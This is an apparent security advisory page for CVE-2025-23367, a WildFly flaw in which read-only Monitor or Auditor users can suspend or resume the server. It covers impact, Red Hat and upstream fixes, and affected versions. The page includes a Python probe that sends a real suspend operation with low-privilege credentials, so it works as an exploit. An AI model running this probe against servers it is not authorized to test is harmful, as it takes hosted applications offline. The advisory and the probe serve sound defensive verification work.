VYPR
Moderate severity · OSV Advisory · Published Jan 30, 2025 · Updated Apr 30, 2026

org.wildfly.core:wildfly-server: WildFly improper RBAC permission

CVE-2025-23367

Description

A flaw was found in the Wildfly Server Role Based Access Control (RBAC) provider. When authorization to control management operations is secured using the Role Based Access Control provider, a user without the required privileges can suspend or resume the server. A user with a Monitor or Auditor role is supposed to have only read access permissions and should not be able to suspend the server. The vulnerability is caused by the Suspend and Resume handlers not performing authorization checks to validate whether the current user has the required permissions to proceed with the action.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

CVE-2025-23367: In WildFly, the RBAC provider fails to enforce authorization for Suspend/Resume handlers, letting users with Monitor/Auditor roles suspend the server.

Vulnerability

Description

A flaw in WildFly's Role Based Access Control (RBAC) provider allows users assigned the Monitor or Auditor roles, which are intended to grant only read access to the management model, to suspend or resume the server. The root cause is that the Suspend and Resume management operation handlers do not perform an authorization check to verify that the current user holds the required permission before executing the action [1].

Exploitation

To exploit this vulnerability, an attacker must first have valid credentials for a WildFly user account that has been granted the Monitor or Auditor role. The attacker can then send a management operation request to suspend or resume the server, which the handler will process without verifying that the user has the necessary write-level authorization. No additional privileges or network position beyond access to the management interface are required [2].
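The request path described above, turned into a check an administrator can run against a test instance. This is an added example, not code from the advisory, Red Hat or the WildFly project; it assumes a standalone WildFly with the HTTP management interface at its default location (http://HOST:9990/management) using Digest authentication, and credentials for a user mapped to the Monitor or Auditor role. Do not point it at production: on a vulnerable server the `suspend` actually takes effect.

```python
"""Probe for CVE-2025-23367: does a read-only RBAC principal get to run :suspend?

Added example; not code from the advisory, Red Hat or the WildFly project.
Assumptions: standalone WildFly, HTTP management interface on
http://HOST:9990/management secured with the RBAC provider, Digest auth, and
the credentials of a user mapped to the Monitor or Auditor role. Run it only
against a test instance: on a vulnerable server the :suspend really suspends
it (the script resumes right away, but in-flight requests are still affected).
"""
import json
import sys
import urllib.error
import urllib.request


def management_op(operation, **params):
    """Build one JSON operation against the standalone root resource (address [])."""
    op = {"operation": operation, "address": []}
    op.update(params)
    return op


def classify(body):
    """Map a management response body to 'allowed', 'denied' or 'failed'.

    WildFly reports an RBAC denial as outcome=failed with a failure-description
    saying the caller is unauthorized / permission denied. Any other
    non-success is an unrelated failure and must not be mistaken for
    enforcement."""
    if body.get("outcome") == "success":
        return "allowed"
    desc = str(body.get("failure-description", ""))
    if "Unauthorized" in desc or "Permission denied" in desc:
        return "denied"
    return "failed"


def assess(read_result, suspend_result):
    """Turn the two probe results into a verdict.

    A read-only principal must be able to read suspend-state; if it cannot,
    the credentials or role mapping are wrong and the suspend result proves
    nothing."""
    if read_result != "allowed":
        return "inconclusive: read-only principal cannot even read suspend-state"
    if suspend_result == "allowed":
        return "VULNERABLE: read-only principal suspended the server"
    if suspend_result == "denied":
        return "enforced: suspend denied to read-only principal"
    return "inconclusive: suspend failed for a reason other than authorization"


def send(url, user, password, op):
    """POST one operation to the HTTP management API with Digest auth.

    Failed operations come back with a non-2xx status but still carry a JSON
    body with failure-description, so the HTTPError body is parsed as well."""
    mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
    mgr.add_password(None, url, user, password)
    opener = urllib.request.build_opener(urllib.request.HTTPDigestAuthHandler(mgr))
    req = urllib.request.Request(
        url, data=json.dumps(op).encode(), method="POST",
        headers={"Content-Type": "application/json"})
    try:
        with opener.open(req, timeout=15) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as err:
        try:
            return json.load(err)
        except ValueError:
            return {"outcome": "failed", "failure-description": f"HTTP {err.code}"}


def probe(url, user, password):
    """Read suspend-state (should work), try :suspend, undo it if it went through."""
    read = classify(send(url, user, password,
                         management_op("read-attribute", name="suspend-state")))
    suspend = classify(send(url, user, password, management_op("suspend")))
    if suspend == "allowed":
        send(url, user, password, management_op("resume"))
    return assess(read, suspend)


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit("usage: probe.py http://host:9990/management monitor-user password")
    print(probe(*sys.argv[1:]))
```

The read of `suspend-state` is the control: a Monitor or Auditor user is expected to pass it, so a denial there means the account or role mapping is wrong rather than that the server is patched. A `failed` outcome on `suspend` for any reason other than an authorization message is reported as inconclusive, not as enforcement.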

Impact

A successful attack leads to a denial-of-service condition: an unauthorized user can suspend the WildFly server, so it stops accepting new requests and becomes unavailable to the applications it hosts. Conversely, such a user can resume a server that an administrator suspended deliberately (for example during a graceful shutdown or a maintenance window), undoing that administrative control. The confidentiality and integrity of the server's data are not directly compromised [3][4].

Mitigation

Red Hat has released security updates (RHSA-2025:3465, RHSA-2025:3989, RHSA-2025:3990, and RHSA-2025:4550) for the affected products, including Red Hat Enterprise Linux and Red Hat Single Sign-On, and upstream WildFly Core carries the fix in 27.0.1.Final and 28.0.0.Beta2. Administrators should apply the updates so that the Suspend and Resume handlers perform authorization checks. There are no known workarounds; upgrading to the fixed versions is the recommended course of action. Until the upgrade is in place, exposure is reduced by restricting network access to the management interface and by reviewing which principals are mapped to the Monitor and Auditor roles, since any of them can trigger the suspend [1][2][3][4].

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                                 | Affected versions                 | Patched versions
org.wildfly.core:wildfly-server (Maven) | < 27.0.1.Final                    | 27.0.1.Final
org.wildfly.core:wildfly-server (Maven) | >= 28.0.0.Beta1, < 28.0.0.Beta2   | 28.0.0.Beta2

Affected products (1)

  • Range: 10.0.0.Alpha1, 10.0.0.Alpha2, 10.0.0.Alpha3, …
